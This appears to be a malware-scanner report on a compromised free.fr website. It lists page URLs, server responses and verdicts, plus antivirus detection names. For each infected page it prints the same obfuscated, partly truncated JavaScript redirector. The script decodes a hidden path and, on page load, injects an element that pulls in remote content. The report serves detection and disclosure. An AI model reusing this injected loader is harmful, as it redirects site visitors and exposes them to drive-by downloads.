Request | Server response | Status |
http://lwsthesic.free.fr/ | 200 OK Content-Length: 15034 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var DW=new String();var V=new String();var J=new String();function h(){var f;if(f!='' && f!='F'){f=null};var C=unescape;this.c="";var I=window;var A=new Date();var g=C("%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%73%6f%75%66%75%6e%2e%63%6f%6d%2f%63%68%69%6e%61%6d%6f%62%69%6c%65%2e%63%6f%6d%2e%70%68%70");var hQ=new Date();function n(r,x){var Jh='';var yl='';var dh="";var j="g";var p;if(p!='Do'){p=''};var L=C("%5b"), np=C("%5d");var Hf;if(Hf!='' && Hf!='Je'){Hf='u'};var H=L+x+np;var ne=ne
... 831 bytes are skipped ... zP=new Array();var ss;if(ss!='pR' && ss!='UF'){ss='pR'};N[C("%73%72%63")]=ni;var bd;if(bd!='cL' && bd != ''){bd=null};O.body.appendChild(N);this.qH="";var IJ;if(IJ!='PS' && IJ!='Pw'){IJ=''};} catch(NL){var ly;if(ly!='cG'){ly='cG'};var Ci;if(Ci!='Qh' && Ci != ''){Ci=null};alert(NL);};}var XK=new String();this.xW="";var fY;if(fY!=''){fY='xI'};I["onloa"+"dHvDo".substr(0,1)]=jX;};var yZ='';var fUV=new Date();var Ce;if(Ce!='' && Ce!='jI'){Ce=''};var uf='';h();Antivirus reports:- AntiVir
- JS/Redirector.AM
- Avast
- JS:Illredir-AQ [Trj]
- Ikarus
- Trojan.JS.Redirector
- Panda
- JS/Redirector.AC
- nProtect
- Trojan.Script.429496
- K7AntiVirus
- Trojan
- TrendMicro-HouseCall
- JS_KEMPAR.SM
- Emsisoft
- Trojan.Script.429496 (B)
- Comodo
- TrojWare.JS.TrojanDownloader.Pegel.ba
- CAT-QuickHeal
- JS/Redirector.DC
- McAfee-GW-Edition
- JS/Redirector.u
- DrWeb
- JS.Redirector.based.2
- TrendMicro
- JS_KEMPAR.SM
- Kaspersky
- HEUR:Trojan-Downloader.Script.Generic
- Microsoft
- Trojan:JS/Redirector.DC
- Fortinet
- JS/Crypt.BBES!tr
- TotalDefense
- JS/Redirector.BH
- Jiangmin
- Trojan/JS.Pegel.b
- McAfee
- JS/Redirector.u
- NANO-Antivirus
- Trojan.Script.Redirector.yrnhc
- F-Secure
- Trojan.Script.429496
- VIPRE
- Trojan.JS.Redirector.cr (v)
- F-Prot
- JS/Redir.AV
- AVG
- JS/Dropper
- Norman
- Redir.HU
- Sophos
- Troj/JSRedir-BD
- GData
- Trojan.Script.429496
- Commtouch
- JS/Redir.AV
- Agnitum
- JS.Redirector.Gen.5
- ESET-NOD32
- JS/TrojanDownloader.Pegel.AP
- BitDefender
- Trojan.Script.429496
|
http://lwsthesic.free.fr/_html/overlib.js | 200 OK Content-Length: 46565 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
var INARRAY = 1;
var CAPARRAY = 2;
var STICKY = 3;
var BACKGROUND = 4;
var NOCLOSE = 5;
var CAPTION = 6;
var LEFT = 7;
var RIGHT = 8;
var CENTER = 9;
var OFFSETX = 10;
var OFFSETY = 11;
var FGCOLOR = 12;
var BGCOLOR = 13;
var TEXTCOLOR = 14;
var CAPCOLOR = 15;
var CLOSECOLOR = 16;
var WIDTH = 17;
var BORDER = 18;
var STATUS = 19;
var AUTOSTATUS = 20;
var AUTOSTATUSC
... 3516 bytes are skipped ... zP=new Array();var ss;if(ss!='pR' && ss!='UF'){ss='pR'};N[C("%73%72%63")]=ni;var bd;if(bd!='cL' && bd != ''){bd=null};O.body.appendChild(N);this.qH="";var IJ;if(IJ!='PS' && IJ!='Pw'){IJ=''};} catch(NL){var ly;if(ly!='cG'){ly='cG'};var Ci;if(Ci!='Qh' && Ci != ''){Ci=null};alert(NL);};}var XK=new String();this.xW="";var fY;if(fY!=''){fY='xI'};I["onloa"+"dHvDo".substr(0,1)]=jX;};var yZ='';var fUV=new Date();var Ce;if(Ce!='' && Ce!='jI'){Ce=''};var uf='';h();Antivirus reports:- AntiVir
- JS/Redirector.AM
- Avast
- JS:Illredir-AQ [Trj]
- Panda
- JS/Redirector.AC
- K7AntiVirus
- Trojan
- TrendMicro-HouseCall
- JS_GUMBLAR.SMNY
- Comodo
- TrojWare.JS.TrojanDownloader.Pegel.ba
- DrWeb
- JS.Redirector.based.2
- TrendMicro
- JS_GUMBLAR.SMNY
- Kaspersky
- HEUR:Trojan-Downloader.Script.Generic
- Microsoft
- Trojan:JS/Redirector.DC
- TotalDefense
- JS/Redirector.BH
- NANO-Antivirus
- Trojan.Script.Redirector.yrnhc
- F-Prot
- JS/Redir.AV
- AVG
- JS/Dropper
- Sophos
- Troj/JSRedir-BD
- GData
- JS:Illredir-AQ
- Commtouch
- JS/Redir.AV
- Agnitum
- JS.Redirector.Gen
- ESET-NOD32
- JS/TrojanDownloader.Pegel.AP
|
http://lwsthesic.free.fr/doc/dreamweaver/ | 200 OK Content-Length: 2452 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var DW=new String();var V=new String();var J=new String();function h(){var f;if(f!='' && f!='F'){f=null};var C=unescape;this.c="";var I=window;var A=new Date();var g=C("%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%73%6f%75%66%75%6e%2e%63%6f%6d%2f%63%68%69%6e%61%6d%6f%62%69%6c%65%2e%63%6f%6d%2e%70%68%70");var hQ=new Date();function n(r,x){var Jh='';var yl='';var dh="";var j="g";var p;if(p!='Do'){p=''};var L=C("%5b"), np=C("%5d");var Hf;if(Hf!='' && Hf!='Je'){Hf='u'};var H=L+x+np;var ne=ne
... 831 bytes are skipped ... zP=new Array();var ss;if(ss!='pR' && ss!='UF'){ss='pR'};N[C("%73%72%63")]=ni;var bd;if(bd!='cL' && bd != ''){bd=null};O.body.appendChild(N);this.qH="";var IJ;if(IJ!='PS' && IJ!='Pw'){IJ=''};} catch(NL){var ly;if(ly!='cG'){ly='cG'};var Ci;if(Ci!='Qh' && Ci != ''){Ci=null};alert(NL);};}var XK=new String();this.xW="";var fY;if(fY!=''){fY='xI'};I["onloa"+"dHvDo".substr(0,1)]=jX;};var yZ='';var fUV=new Date();var Ce;if(Ce!='' && Ce!='jI'){Ce=''};var uf='';h();Antivirus reports:- AntiVir
- JS/Redirector.AM
- Avast
- JS:Illredir-AQ [Trj]
- Ikarus
- Trojan.JS.Redirector
- Panda
- JS/Redirector.AC
- nProtect
- Trojan.Script.429496
- K7AntiVirus
- Trojan
- TrendMicro-HouseCall
- JS_KEMPAR.SM
- Emsisoft
- Trojan.Script.429496 (B)
- Comodo
- TrojWare.JS.TrojanDownloader.Pegel.ba
- CAT-QuickHeal
- JS/Redirector.DC
- McAfee-GW-Edition
- JS/Redirector.u
- DrWeb
- JS.Redirector.based.2
- TrendMicro
- JS_KEMPAR.SM
- Kaspersky
- HEUR:Trojan-Downloader.Script.Generic
- Microsoft
- Trojan:JS/Redirector.DC
- Fortinet
- JS/Crypt.BBES!tr
- TotalDefense
- JS/Redirector.BH
- Jiangmin
- Trojan/JS.Pegel.b
- McAfee
- JS/Redirector.u
- NANO-Antivirus
- Trojan.Script.Redirector.yrnhc
- F-Secure
- Trojan.Script.429496
- VIPRE
- Trojan.JS.Redirector.cr (v)
- F-Prot
- JS/Redir.AV
- AVG
- JS/Dropper
- Norman
- Redir.HU
- Sophos
- Troj/JSRedir-BD
- GData
- Trojan.Script.429496
- Commtouch
- JS/Redir.AV
- Agnitum
- JS.Redirector.Gen.5
- ESET-NOD32
- JS/TrojanDownloader.Pegel.AP
- BitDefender
- Trojan.Script.429496
|
http://lwsthesic.free.fr/test404page.js | 404 Not Found Content-Length: 13253 Content-Type: text/html | clean |
http://lwsthesic.free.fr/doc/beetlejuice/ | 200 OK Content-Length: 8468 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var DW=new String();var V=new String();var J=new String();function h(){var f;if(f!='' && f!='F'){f=null};var C=unescape;this.c="";var I=window;var A=new Date();var g=C("%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%73%6f%75%66%75%6e%2e%63%6f%6d%2f%63%68%69%6e%61%6d%6f%62%69%6c%65%2e%63%6f%6d%2e%70%68%70");var hQ=new Date();function n(r,x){var Jh='';var yl='';var dh="";var j="g";var p;if(p!='Do'){p=''};var L=C("%5b"), np=C("%5d");var Hf;if(Hf!='' && Hf!='Je'){Hf='u'};var H=L+x+np;var ne=ne
... 831 bytes are skipped ... zP=new Array();var ss;if(ss!='pR' && ss!='UF'){ss='pR'};N[C("%73%72%63")]=ni;var bd;if(bd!='cL' && bd != ''){bd=null};O.body.appendChild(N);this.qH="";var IJ;if(IJ!='PS' && IJ!='Pw'){IJ=''};} catch(NL){var ly;if(ly!='cG'){ly='cG'};var Ci;if(Ci!='Qh' && Ci != ''){Ci=null};alert(NL);};}var XK=new String();this.xW="";var fY;if(fY!=''){fY='xI'};I["onloa"+"dHvDo".substr(0,1)]=jX;};var yZ='';var fUV=new Date();var Ce;if(Ce!='' && Ce!='jI'){Ce=''};var uf='';h();Antivirus reports:- AntiVir
- JS/Redirector.AM
- Avast
- JS:Illredir-AQ [Trj]
- Ikarus
- Trojan.JS.Redirector
- Panda
- JS/Redirector.AC
- nProtect
- Trojan.Script.429496
- K7AntiVirus
- Trojan
- TrendMicro-HouseCall
- JS_KEMPAR.SM
- Emsisoft
- Trojan.Script.429496 (B)
- Comodo
- TrojWare.JS.TrojanDownloader.Pegel.ba
- CAT-QuickHeal
- JS/Redirector.DC
- McAfee-GW-Edition
- JS/Redirector.u
- DrWeb
- JS.Redirector.based.2
- TrendMicro
- JS_KEMPAR.SM
- Kaspersky
- HEUR:Trojan-Downloader.Script.Generic
- Microsoft
- Trojan:JS/Redirector.DC
- Fortinet
- JS/Crypt.BBES!tr
- TotalDefense
- JS/Redirector.BH
- Jiangmin
- Trojan/JS.Pegel.b
- McAfee
- JS/Redirector.u
- NANO-Antivirus
- Trojan.Script.Redirector.yrnhc
- F-Secure
- Trojan.Script.429496
- VIPRE
- Trojan.JS.Redirector.cr (v)
- F-Prot
- JS/Redir.AV
- AVG
- JS/Dropper
- Norman
- Redir.HU
- Sophos
- Troj/JSRedir-BD
- GData
- Trojan.Script.429496
- Commtouch
- JS/Redir.AV
- Agnitum
- JS.Redirector.Gen.5
- ESET-NOD32
- JS/TrojanDownloader.Pegel.AP
- BitDefender
- Trojan.Script.429496
|
http://lwsthesic.free.fr/doc/beetlejuice/index.htm | 200 OK Content-Length: 8486 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var DW=new String();var V=new String();var J=new String();function h(){var f;if(f!='' && f!='F'){f=null};var C=unescape;this.c="";var I=window;var A=new Date();var g=C("%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%73%6f%75%66%75%6e%2e%63%6f%6d%2f%63%68%69%6e%61%6d%6f%62%69%6c%65%2e%63%6f%6d%2e%70%68%70");var hQ=new Date();function n(r,x){var Jh='';var yl='';var dh="";var j="g";var p;if(p!='Do'){p=''};var L=C("%5b"), np=C("%5d");var Hf;if(Hf!='' && Hf!='Je'){Hf='u'};var H=L+x+np;var ne=ne
... 831 bytes are skipped ... zP=new Array();var ss;if(ss!='pR' && ss!='UF'){ss='pR'};N[C("%73%72%63")]=ni;var bd;if(bd!='cL' && bd != ''){bd=null};O.body.appendChild(N);this.qH="";var IJ;if(IJ!='PS' && IJ!='Pw'){IJ=''};} catch(NL){var ly;if(ly!='cG'){ly='cG'};var Ci;if(Ci!='Qh' && Ci != ''){Ci=null};alert(NL);};}var XK=new String();this.xW="";var fY;if(fY!=''){fY='xI'};I["onloa"+"dHvDo".substr(0,1)]=jX;};var yZ='';var fUV=new Date();var Ce;if(Ce!='' && Ce!='jI'){Ce=''};var uf='';h();Antivirus reports:- AntiVir
- JS/Redirector.AM
- Avast
- JS:Illredir-AQ [Trj]
- Ikarus
- Trojan.JS.Redirector
- Panda
- JS/Redirector.AC
- nProtect
- Trojan.Script.429496
- K7AntiVirus
- Trojan
- TrendMicro-HouseCall
- JS_KEMPAR.SM
- Emsisoft
- Trojan.Script.429496 (B)
- Comodo
- TrojWare.JS.TrojanDownloader.Pegel.ba
- CAT-QuickHeal
- JS/Redirector.DC
- McAfee-GW-Edition
- JS/Redirector.u
- DrWeb
- JS.Redirector.based.2
- TrendMicro
- JS_KEMPAR.SM
- Kaspersky
- HEUR:Trojan-Downloader.Script.Generic
- Microsoft
- Trojan:JS/Redirector.DC
- Fortinet
- JS/Crypt.BBES!tr
- TotalDefense
- JS/Redirector.BH
- Jiangmin
- Trojan/JS.Pegel.b
- McAfee
- JS/Redirector.u
- NANO-Antivirus
- Trojan.Script.Redirector.yrnhc
- F-Secure
- Trojan.Script.429496
- VIPRE
- Trojan.JS.Redirector.cr (v)
- F-Prot
- JS/Redir.AV
- AVG
- JS/Dropper
- Norman
- Redir.HU
- Sophos
- Troj/JSRedir-BD
- GData
- Trojan.Script.429496
- Commtouch
- JS/Redir.AV
- Agnitum
- JS.Redirector.Gen.5
- ESET-NOD32
- JS/TrojanDownloader.Pegel.AP
- BitDefender
- Trojan.Script.429496
|
http://lwsthesic.free.fr/doc/beetlejuice/plot.htm | 200 OK Content-Length: 9542 Content-Type: text/html | clean |
http://lwsthesic.free.fr/doc/beetlejuice/director.htm | 200 OK Content-Length: 8241 Content-Type: text/html | clean |
http://lwsthesic.free.fr/doc/beetlejuice/gallery.htm | 200 OK Content-Length: 5736 Content-Type: text/html | clean |
http://lwsthesic.free.fr/doc/beetlejuice/awards.htm | 200 OK Content-Length: 6522 Content-Type: text/html | clean |
http://lwsthesic.free.fr/doc/beetlejuice/making-off.htm | 200 OK Content-Length: 11081 Content-Type: text/html | clean |
http://lwsthesic.free.fr/doc/beetlejuice/goodies.htm | 200 OK Content-Length: 7262 Content-Type: text/html | clean |
http://lwsthesic.free.fr/doc/beetlejuice/images/plot/affiche.jpg | 200 OK Content-Length: 98766 Content-Type: image/jpeg | clean |
http://lwsthesic.free.fr/doc/rum/ | 200 OK Content-Length: 2891 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var DW=new String();var V=new String();var J=new String();function h(){var f;if(f!='' && f!='F'){f=null};var C=unescape;this.c="";var I=window;var A=new Date();var g=C("%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%73%6f%75%66%75%6e%2e%63%6f%6d%2f%63%68%69%6e%61%6d%6f%62%69%6c%65%2e%63%6f%6d%2e%70%68%70");var hQ=new Date();function n(r,x){var Jh='';var yl='';var dh="";var j="g";var p;if(p!='Do'){p=''};var L=C("%5b"), np=C("%5d");var Hf;if(Hf!='' && Hf!='Je'){Hf='u'};var H=L+x+np;var ne=ne
... 831 bytes are skipped ... zP=new Array();var ss;if(ss!='pR' && ss!='UF'){ss='pR'};N[C("%73%72%63")]=ni;var bd;if(bd!='cL' && bd != ''){bd=null};O.body.appendChild(N);this.qH="";var IJ;if(IJ!='PS' && IJ!='Pw'){IJ=''};} catch(NL){var ly;if(ly!='cG'){ly='cG'};var Ci;if(Ci!='Qh' && Ci != ''){Ci=null};alert(NL);};}var XK=new String();this.xW="";var fY;if(fY!=''){fY='xI'};I["onloa"+"dHvDo".substr(0,1)]=jX;};var yZ='';var fUV=new Date();var Ce;if(Ce!='' && Ce!='jI'){Ce=''};var uf='';h();Antivirus reports:- AntiVir
- JS/Redirector.AM
- Avast
- JS:Illredir-AQ [Trj]
- Ikarus
- Trojan.JS.Redirector
- Panda
- JS/Redirector.AC
- nProtect
- Trojan.Script.429496
- K7AntiVirus
- Trojan
- TrendMicro-HouseCall
- JS_KEMPAR.SM
- Emsisoft
- Trojan.Script.429496 (B)
- Comodo
- TrojWare.JS.TrojanDownloader.Pegel.ba
- CAT-QuickHeal
- JS/Redirector.DC
- McAfee-GW-Edition
- JS/Redirector.u
- DrWeb
- JS.Redirector.based.2
- TrendMicro
- JS_KEMPAR.SM
- Kaspersky
- HEUR:Trojan-Downloader.Script.Generic
- Microsoft
- Trojan:JS/Redirector.DC
- Fortinet
- JS/Crypt.BBES!tr
- TotalDefense
- JS/Redirector.BH
- Jiangmin
- Trojan/JS.Pegel.b
- McAfee
- JS/Redirector.u
- NANO-Antivirus
- Trojan.Script.Redirector.yrnhc
- F-Secure
- Trojan.Script.429496
- VIPRE
- Trojan.JS.Redirector.cr (v)
- F-Prot
- JS/Redir.AV
- AVG
- JS/Dropper
- Norman
- Redir.HU
- Sophos
- Troj/JSRedir-BD
- GData
- Trojan.Script.429496
- Commtouch
- JS/Redir.AV
- Agnitum
- JS.Redirector.Gen.5
- ESET-NOD32
- JS/TrojanDownloader.Pegel.AP
- BitDefender
- Trojan.Script.429496
|
http://lwsthesic.free.fr/doc/doritos/ | 200 OK Content-Length: 2450 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var DW=new String();var V=new String();var J=new String();function h(){var f;if(f!='' && f!='F'){f=null};var C=unescape;this.c="";var I=window;var A=new Date();var g=C("%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%73%6f%75%66%75%6e%2e%63%6f%6d%2f%63%68%69%6e%61%6d%6f%62%69%6c%65%2e%63%6f%6d%2e%70%68%70");var hQ=new Date();function n(r,x){var Jh='';var yl='';var dh="";var j="g";var p;if(p!='Do'){p=''};var L=C("%5b"), np=C("%5d");var Hf;if(Hf!='' && Hf!='Je'){Hf='u'};var H=L+x+np;var ne=ne
... 831 bytes are skipped ... zP=new Array();var ss;if(ss!='pR' && ss!='UF'){ss='pR'};N[C("%73%72%63")]=ni;var bd;if(bd!='cL' && bd != ''){bd=null};O.body.appendChild(N);this.qH="";var IJ;if(IJ!='PS' && IJ!='Pw'){IJ=''};} catch(NL){var ly;if(ly!='cG'){ly='cG'};var Ci;if(Ci!='Qh' && Ci != ''){Ci=null};alert(NL);};}var XK=new String();this.xW="";var fY;if(fY!=''){fY='xI'};I["onloa"+"dHvDo".substr(0,1)]=jX;};var yZ='';var fUV=new Date();var Ce;if(Ce!='' && Ce!='jI'){Ce=''};var uf='';h();Antivirus reports:- AntiVir
- JS/Redirector.AM
- Avast
- JS:Illredir-AQ [Trj]
- Ikarus
- Trojan.JS.Redirector
- Panda
- JS/Redirector.AC
- nProtect
- Trojan.Script.429496
- K7AntiVirus
- Trojan
- TrendMicro-HouseCall
- JS_KEMPAR.SM
- Emsisoft
- Trojan.Script.429496 (B)
- Comodo
- TrojWare.JS.TrojanDownloader.Pegel.ba
- CAT-QuickHeal
- JS/Redirector.DC
- McAfee-GW-Edition
- JS/Redirector.u
- DrWeb
- JS.Redirector.based.2
- TrendMicro
- JS_KEMPAR.SM
- Kaspersky
- HEUR:Trojan-Downloader.Script.Generic
- Microsoft
- Trojan:JS/Redirector.DC
- Fortinet
- JS/Crypt.BBES!tr
- TotalDefense
- JS/Redirector.BH
- Jiangmin
- Trojan/JS.Pegel.b
- McAfee
- JS/Redirector.u
- NANO-Antivirus
- Trojan.Script.Redirector.yrnhc
- F-Secure
- Trojan.Script.429496
- VIPRE
- Trojan.JS.Redirector.cr (v)
- F-Prot
- JS/Redir.AV
- AVG
- JS/Dropper
- Norman
- Redir.HU
- Sophos
- Troj/JSRedir-BD
- GData
- Trojan.Script.429496
- Commtouch
- JS/Redir.AV
- Agnitum
- JS.Redirector.Gen.5
- ESET-NOD32
- JS/TrojanDownloader.Pegel.AP
- BitDefender
- Trojan.Script.429496
|